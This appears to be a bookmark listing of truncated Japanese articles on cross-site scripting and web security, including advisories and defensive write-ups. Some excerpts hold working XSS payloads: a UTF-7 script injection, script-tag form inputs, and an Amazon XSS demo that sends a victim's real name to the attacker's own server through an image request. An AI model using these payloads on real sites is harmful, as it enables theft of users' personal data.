iOS向けSkypeに重大な脆弱性発見!使ってる人は今すぐ対策を!
結構やばそうです...... こんばんは。Pineです。 今日、Skypeに重大な脆弱性が見つかったというニュースが入りました。 まだ公式発表のものではありませんが、なかなか有力なものとなっています。 Skypeは公式にこの脆弱性を認め、現在Bug Fix中です 詳細は以下から............. 今回脆弱性を発表したサイトはこちら http://superevr.com/blog/ そしてここで公開されているデモ動画はこちらです 一通り見てみると少しわかりますが、iPhone版Skypeに大して特定のユーザー 名に設定した後メッセージを送ることで、iPhone側で処理を行うことができ、 それによってデータを吸い出しているようです。 はじめ見たときは信じられなかったのですが、調べてみるともっともなようです。 Skypeは、ユーザー名を表示するときにUIWebViewを用いて表示してい
このところ,検索エンジンへのiframeインジェクション攻撃が大量に発生している。これについて,何人かが詳しい情報を寄せてくれた。Dancho Danchev氏ブログ投稿記事は,これまでの経緯を知るのにうってつけで,さらに被害を受けた人気ニュース・サイトを何カ所か掲載している。かなり多くの攻撃を受けているらしい米USAトゥディ紙も,記事に米IBMの研究開発チームX-Forceの見解を載せている(関連記事:IFRAME攻撃,USAToday.comなど主要なWebサイトが続々とターゲットに)。 米グーグルの検索エンジンが攻撃の発端となっていることから,多くの注目を集めている。ただし,ここではっきりさせておきたいのは,今回のぜい弱性そのものはグーグル(あるいは,そのほかの主要検索エンジン)の中に存在しない。攻撃の中心となるのは,Webサイト上のアプリケーションが「searched-for」コン
補足 この記事は旧徳丸浩の日記からの転載です(元URL、アーカイブ、はてなブックマーク1、はてなブックマーク2)。 備忘のため転載いたしますが、この記事は2007年12月6日に公開されたもので、当時の徳丸の考えを示すものを、基本的に内容を変更せずにそのまま転載するものです。 補足終わり 最近、画像ファイルを用いたクロスサイト・スクリプティングが注目されている。本稿では、画像を悪用したXSSについて説明した後、対策方法について解説する。 画像によるXSSとはどのようなものか Internet Explorer(IE)の特性として、コンテンツの種類を判別する際に、レスポンスヘッダ内のContent-Typeだけでなく、コンテンツの内容も判断基準にしている。このため、Content-Typeが例えばimage/gif(GIF画像)となっていても、中身がHTMLであればHTMLと解釈して表示する。
先日公開した「はて☆すたアンケート」にて、アンケートの説明文をはてな記法で書けるよう、機能追加を行った。その際、Template::Plugin::Hatenaを用いた。これは、はてな記法パーサであるText::Hatena(正確には、そのヴァージョン0.16以下)を、Template::Toolkitのプラグインとして使えるようにしたものである。 はてな記法は、それ自体で全ての文書構造を表現できる、あるいは、はてなダイアリのシステム自体は、はてな記法のみしか許容しないというものではなく、たとえば画像を貼る際には、普通にimg要素を書く必要があるし、また、その他の要素についても、記法が用意されていないものについては、「はてなダイアリーのヘルプ - はてなダイアリー利用可能タグ」に掲載されているものに限り、自分でタグを書くことができる。これは自由度を高める反面で、XSSを誘発し得る潜在的なリ
クロスサイト・スクリプティングという言葉は元々,WebアプリケーションのHTMLエンコード漏れなどを利用することによって第三者にJavaScriptを実行させる手法を指す。広義では,HTMLのエンコードによる画面改変などを含むこともある。 前回述べたように,クロスサイト・スクリプティングのぜい弱性はWebアプリケーションに見付かるぜい弱性の半分以上を占める。数年前から指摘されているにもかかわらず,一向になくならない。その理由として,クロスサイト・スクリプティング対策あるいはHTMLエンコード注1)に対する「神話」があり,正しい対策の普及を遅らせているように思う。その「神話」の数々について説明しよう。 注1)実体参照(entity reference)というのが正式だが,あまり普及していない用語なので,HTMLエンコードという用語を用いる 「すべからくHTMLエンコードすべし」が鉄則 HTM
SessionSafeは、ハンブルグ大学のMartin Johnsさんが書いたWeb APの方式案です。 もしWeb APにXSS脆弱性があって、これが攻撃されたとしても、 セッションIDが盗まれない 当該ページ以外の情報が窃取・改竄されない ことを目指しています。 面白いなーと思ったので、内容について少し書きます。 なお、元記事を高速斜め読みしたので、この日記の内容には間違いが含まれているかもしれません。興味のある方は原本を見てください。 セッションIDが盗まれない 以下の二つのドメインがあるとします。 www.example.com secure.example.com セッションIDのCookieは、secureサブドメインに発行します。 Webページを表示する際はwww.example.comのURLにアクセスします。そこで返すHTMLに色々と仕掛けを施します。 HTMLの仕掛け
Web 2.0という言葉で総称される新たなインターネット時代。Webサイトやエンドユーザーに仕掛けられる攻撃もまた,2.0と呼ぶべき進化を遂げようとしている。攻撃者はWeb 2.0の中核技術であるJavaScriptを悪用してブラウザを狙う。従来の脅威対策は全く通用しない。今この瞬間にも,エンドユーザーは個人情報を盗まれる危険にさらされている。 ブログ/SNSなどユーザー発信型のサイト,Ajax,RSS──。華やかさがクローズアップされるWeb 2.0。ところがその裏側では,エンドユーザーに情報盗難などの危険が広がっている(図1)。インターネット・バンキングやEC(電子商取引)サイトのユーザーIDやパスワード,クレジットカード番号はもちろん,企業内のシステムにアクセスするためのパスワードや,パソコンに読み込んだ機密文書データなど,対象はあらゆる情報だ。 2006年12月末,米国のセキュリテ
Ywcafe.net This Page Is Under Construction - Coming Soon! Why am I seeing this 'Under Construction' page? Related Searches: Cheap Air Tickets Top Smart Phones fashion trends Healthy Weight Loss Health Insurance Trademark Free Notice Review our Privacy Policy Service Agreement Legal Notice Privacy Policy
1.概要 今般、次の2.a)のIPAセミナー受付フォームにおいて、クロスサイト・スクリプティング(注)のぜい弱性が発見されました。このぜい弱性を悪用された場合、当該フォームにて申し込みをしようとした方のブラウザ上で不正なスクリプトが実行されてしまう可能性がありました。当該脆弱性を確認した時には、当該セミナーは、募集定員(70名)を超えるお申し込みとなっていました。募集を締め切らせていただくとともに、至急同受付フォームを点検し、再発防止策を講ずるため、1月31日午前11時に同受付フォームのページを閉じさせていただきました。 併せて、当該脆弱性が発見された受付フォームのプログラムを共有する他の受付フォームのページについても、点検のためページを閉じさせていただきました。点検の結果、その受付フォームにおいてもクロスサイト・スクリプティングの脆弱性が確認されましたので、改修した上、脆弱性検査を行
UTF-7 を使ってスクリプトを記述 +ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-+AC8-SCRIPT+AD4- IE は、文字エンコーディングが不明で UTF-7 っぽい文字列があれば、自動判別で UTF-7 となる。
こんにちはこんにちは!! クロスサイトスクリプティングの時間です! XSSというと…! まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね! たとえばこんな感じのフォームから受け取ったパラメータを、 確認として表示するページとか! (入力) <form action="register.cgi" method="post"> タイトル:<input type="text" name="title"> ← 「ぼくはまちちゃん!」を入力 本文:<input type="text" name="body"> ← 「こんにちはこんにちは!!<script>alert(1)</script>」を入力 </form> (確認) <p>この内容で登録していい?</p> <p> タイトル: ぼくはまちちゃん!<br> 本文: こんにちはこんにちは!!<script>alert
XSS脆弱性を悪用したフィッシング詐欺(英Netcraftの情報より引用)<br>表示されているのは本物のページだが,XSS脆弱性を悪用されて,偽のメッセージやリダイレクトのためのメタ・タグなどが埋め込まれている。 フィッシング対策ツールなどを提供している英Netcraftは現地時間6月16日,米PayPalをかたる新たなフィッシング詐欺が確認されたとして注意を呼びかけた。細工が施されたリンクをクリックすると,PayPalの本物のWebサイトが表示されてから,偽サイトへリダイレクトされる。このため,通常のフィッシングよりもだまされる可能性が高いとする。 今回のフィッシングは,PayPalのサイトに見つかったクロスサイト・スクリプティング(XSS)の脆弱性を悪用する。Webページ(Webアプリケーション)にXSS脆弱性が存在する場合,攻撃者は細工を施したリンク(URL)をユーザーにクリックさ
本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!
↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 本名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
サーブレットコンテナが抱える問題を認識する:Strutsで作るセキュアWebアプリケーション(2)(1/3 ページ) 第1回「適切なエスケープ処理でクロスサイトスクリプティングに備える」では、Strutsカスタムタグを使用する際の注意点を解説した。今回はサーブレットコンテナが抱える問題にまで視野を広げて、クロスサイトスクリプティング(Cross Site Scripting:XSS)に関する注意点を考察していこう。 エラーページで動作するスクリプト アプリケーションが返すレスポンスは、必ずしもアプリケーションの開発者が作成したものとは限らない。例えば、アプリケーション内において例外が発生した場合、明示的な指定がなければ製品のデフォルトエラーページが表示される。デフォルトエラーページはデバッグ用に用意されているものが多いため、表示内容には問題の起因となったパラメータやスタックトレースが含まれ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
